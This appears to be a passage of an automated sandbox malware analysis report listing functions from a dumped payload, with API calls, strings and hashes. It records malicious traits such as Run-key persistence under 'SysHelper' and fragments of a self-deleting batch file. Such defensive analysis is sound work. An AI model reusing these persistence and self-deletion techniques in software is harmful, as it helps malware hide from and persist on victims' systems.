                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c05922d8a427e4c9b5d7d978dc1f0fd11c407c017bfc0b3ad0e2a6fc055280bd
                                                                                                                            • Instruction ID: f76a53b73cba9dc9b4593fa3b0874ff71f6057713450caed2ec5273498de07a3
                                                                                                                            • Opcode Fuzzy Hash: c05922d8a427e4c9b5d7d978dc1f0fd11c407c017bfc0b3ad0e2a6fc055280bd
                                                                                                                            • Instruction Fuzzy Hash: 6631F6705183419FD741EF2AC880A4BF7E5FFD9258F05C95EF98897221E734A9848BA2
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00480F30 Relevance: .1, Instructions: 76COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                            • Instruction ID: 627692af851074bf73a56ecb9461e8c2eb2ff5ccebaf4b6d7d684eda1aa776b7
                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                            • Instruction Fuzzy Hash: 3D117B7732109143D6F49A2DC4B46FFA395EBC532072CCB67D3418B754D2AAA44DA708
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0046A660 Relevance: .1, Instructions: 71COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                            • Instruction ID: 417c8c0aac26af4335dc2a6acf87b7d85be2d5d3f6c23f0ca05d590271600cad
                                                                                                                            • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                            • Instruction Fuzzy Hash: 25113D0A8492C4BDCF424A7880E56EBEFA58E37218F4A71DA88C45B753D01B190FE7A1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00469DFA Relevance: .0, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                            • Instruction ID: 418c05dbf689c4732020dc68c3bfca6e864df3fd32629b86a6575d14899c0282
                                                                                                                            • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                            • Instruction Fuzzy Hash: 73014B769106629BD700DF3EC8C045AFBF1BB082117528B3ADC9083A41D338F662DBE8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00461178 Relevance: .0, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e3341b5f5026255b3e10dab3ee1a4deb800ad15e8bbd937bb2409ed5fdd4473
                                                                                                                            • Instruction ID: 6ebffecdd013a00237adbdf1a6f44b859355c32ab2a16901d45878d2342b18e9
                                                                                                                            • Opcode Fuzzy Hash: 5e3341b5f5026255b3e10dab3ee1a4deb800ad15e8bbd937bb2409ed5fdd4473
                                                                                                                            • Instruction Fuzzy Hash: 23C09B315002008FD725CB34DD613E273B27797301F199C95D51757014E73E9015C607
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004724E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214synchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004724FE
                                                                                                                            • GetLastError.KERNEL32 ref: 00472509
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047251C
                                                                                                                            • CloseHandle.KERNEL32 ref: 00472539
                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00472550
                                                                                                                            • GetLastError.KERNEL32 ref: 0047255B
                                                                                                                            • CloseHandle.KERNEL32 ref: 0047256E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                                            • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                                            • API String ID: 2372642624-488272950
                                                                                                                            • Opcode ID: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction ID: 5f88596263c58d6bad05855d18bb1be5ee0e1cb815ecbd1d66e99a0c13f0a4f3
                                                                                                                            • Opcode Fuzzy Hash: 1aa57994b312c62297bcd2240da27eced8110425f2e63f3d54dbe38460a2f4a0
                                                                                                                            • Instruction Fuzzy Hash: 36717D72900218AADF209BA0EC89FEE7BACFF55311F004596F609D2191DF759A8DDF60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C35B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                                            • API String ID: 909875538-2733969777
                                                                                                                            • Opcode ID: a883dc80ae879fb279ee3df94bb4b18433c60f90051a7e2e78847cedbd522358
                                                                                                                            • Instruction ID: 15499d9d152e89039ca69ac54aa3ed96a96855e4c846955f700f7056c0425acc
                                                                                                                            • Opcode Fuzzy Hash: a883dc80ae879fb279ee3df94bb4b18433c60f90051a7e2e78847cedbd522358
                                                                                                                            • Instruction Fuzzy Hash: 4AF149B56083006BD760EE65CC42F9B77D89F55709F04482EF98CD7283E678DA0987AB
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00485A97 Relevance: 19.6, APIs: 13, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1503006713-0
                                                                                                                            • Opcode ID: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction ID: f8a7cf97401da2343448bf168c13f6a3994a7ec277660bfed55c334aa3f21e7b
                                                                                                                            • Opcode Fuzzy Hash: 8707b3cd69aea085a4130ea83f189a77d50c8f1082ea57c9a4ecc17b9f7f1363
                                                                                                                            • Instruction Fuzzy Hash: 00210831504A01ABEB267FA6DC42E0F7BE4DF81718F104C2FF44459192EE39A800DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047BAE0 Relevance: 18.3, APIs: 12, Instructions: 320windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0047BB49
                                                                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 0047BBBA
                                                                                                                            • _malloc.LIBCMT ref: 0047BBE4
                                                                                                                            • GetComputerNameW.KERNEL32(00000000,?), ref: 0047BBF4
                                                                                                                            • _free.LIBCMT ref: 0047BCD7
                                                                                                                              • Part of subcall function 00471CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D12
                                                                                                                              • Part of subcall function 00471CD0: _memset.LIBCMT ref: 00471D3B
                                                                                                                              • Part of subcall function 00471CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00471D63
                                                                                                                              • Part of subcall function 00471CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052AC68,000000FF), ref: 00471D6C
                                                                                                                              • Part of subcall function 00471CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00471DD6
                                                                                                                              • Part of subcall function 00471CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00471E48
                                                                                                                            • IsWindow.USER32(?), ref: 0047BF69
                                                                                                                            • DestroyWindow.USER32(?), ref: 0047BF7B
                                                                                                                            • DefWindowProcW.USER32(?,00008003,?,?), ref: 0047BFA8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3873257347-0
                                                                                                                            • Opcode ID: 02ae15585ef7b9c217f9bc3c7fda4642926bc8ac84763ebd6d781653f5710679
                                                                                                                            • Instruction ID: e300812fae18947d0b77bc5eab625d4d4af3f88122f52ba344a76d4532f2ae2d
                                                                                                                            • Opcode Fuzzy Hash: 02ae15585ef7b9c217f9bc3c7fda4642926bc8ac84763ebd6d781653f5710679
                                                                                                                            • Instruction Fuzzy Hash: 9CC1AD71508340AFDB20DF24D8457ABBBE0FF95718F14891EF889933A1D7799808CB9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004870A5 Relevance: 18.3, APIs: 12, Instructions: 289COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 559064418-0
                                                                                                                            • Opcode ID: 8a51ccde56ef7f9e8a912984737ea31a7c734241ac1a8191104467dd5a1c1166
                                                                                                                            • Instruction ID: 71242040d0a962902462f3d554fbeb8ec7c4520c710694e51a093be85d7b5df2
                                                                                                                            • Opcode Fuzzy Hash: 8a51ccde56ef7f9e8a912984737ea31a7c734241ac1a8191104467dd5a1c1166
                                                                                                                            • Instruction Fuzzy Hash: 01B1D371D092299FDF20AB58CC98BAEBBB5EF54314F2404DBD808A6251D738DE80DF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00487B21 Relevance: 18.1, APIs: 12, Instructions: 84COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • DecodePointer.KERNEL32 ref: 00487B29
                                                                                                                            • _free.LIBCMT ref: 00487B42
                                                                                                                              • Part of subcall function 00480BED: HeapFree.KERNEL32(00000000,00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C01
                                                                                                                              • Part of subcall function 00480BED: GetLastError.KERNEL32(00000000,?,0048507F,00000000,0048520D,00480CE9), ref: 00480C13
                                                                                                                            • _free.LIBCMT ref: 00487B55
                                                                                                                            • _free.LIBCMT ref: 00487B73
                                                                                                                            • _free.LIBCMT ref: 00487B85
                                                                                                                            • _free.LIBCMT ref: 00487B96
                                                                                                                            • _free.LIBCMT ref: 00487BA1
                                                                                                                            • _free.LIBCMT ref: 00487BC5
                                                                                                                            • EncodePointer.KERNEL32(00AA2110), ref: 00487BCC
                                                                                                                            • _free.LIBCMT ref: 00487BE1
                                                                                                                            • _free.LIBCMT ref: 00487BF7
                                                                                                                            • _free.LIBCMT ref: 00487C1F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3064303923-0
                                                                                                                            • Opcode ID: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction ID: 2a3507ac28effe5e37248a6376e8cda2c2f13ca6dbe2f94e350d1be6b9853731
                                                                                                                            • Opcode Fuzzy Hash: 5e65701c48902f68ef6406fbf7a20383cbe1bfaf1088c55980e928307351cbde
                                                                                                                            • Instruction Fuzzy Hash: F9216675818590CBCB207F56BC44D1E77A5E71032C324182FE918673A1CAB8B88CBB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00471B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110stringcomCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CoInitialize.OLE32(00000000), ref: 00471BB0
                                                                                                                            • CoCreateInstance.OLE32(0052E908,00000000,00000001,0052D568,00000000), ref: 00471BC8
                                                                                                                            • CoUninitialize.OLE32 ref: 00471BD0
                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00471C12
                                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00471C22
                                                                                                                            • lstrcatW.KERNEL32(?,00560050), ref: 00471C3A
                                                                                                                            • lstrcatW.KERNEL32(?), ref: 00471C44
                                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00471C68
                                                                                                                            • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00471C7A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1665428635.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1665415885.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665499946.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665532937.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665552974.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665573895.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1665683673.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                                            • String ID: \shell32.dll
                                                                                                                            • API String ID: 679253221-3783449302
                                                                                                                            • Opcode ID: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction ID: 7a5933bc3a298e598d6025b3b9a56fce2a251b265cdcf9e1af5fddfdf7b53373
                                                                                                                            • Opcode Fuzzy Hash: 65f5b3423bcd66fa1a364eab39d0b0744349c40df0eb7c6fd9fecb85c134adf3
                                                                                                                            • Instruction Fuzzy Hash: E0414C70A40219AFDB20CBA4CC88FEE7BBCEF59704F004499F509EB190D6B1AE45CB60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B49A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107libraryloaderCOMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000001,?,004B4B72), ref: 004B49C7
                                                                                                                            • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004B49D7
                                                                                                                            • GetDesktopWindow.USER32 ref: 004B49FB
                                                                                                                            • GetProcessWindowStation.USER32(?,004B4B72), ref: 004B4A01
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004B4B72), ref: 004B4A1C
                                                                                                                            • GetLastError.KERNEL32(?,004B4B72), ref: 004B4A2A
                                                                                                                            • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004B4B72), ref: 004B4A65
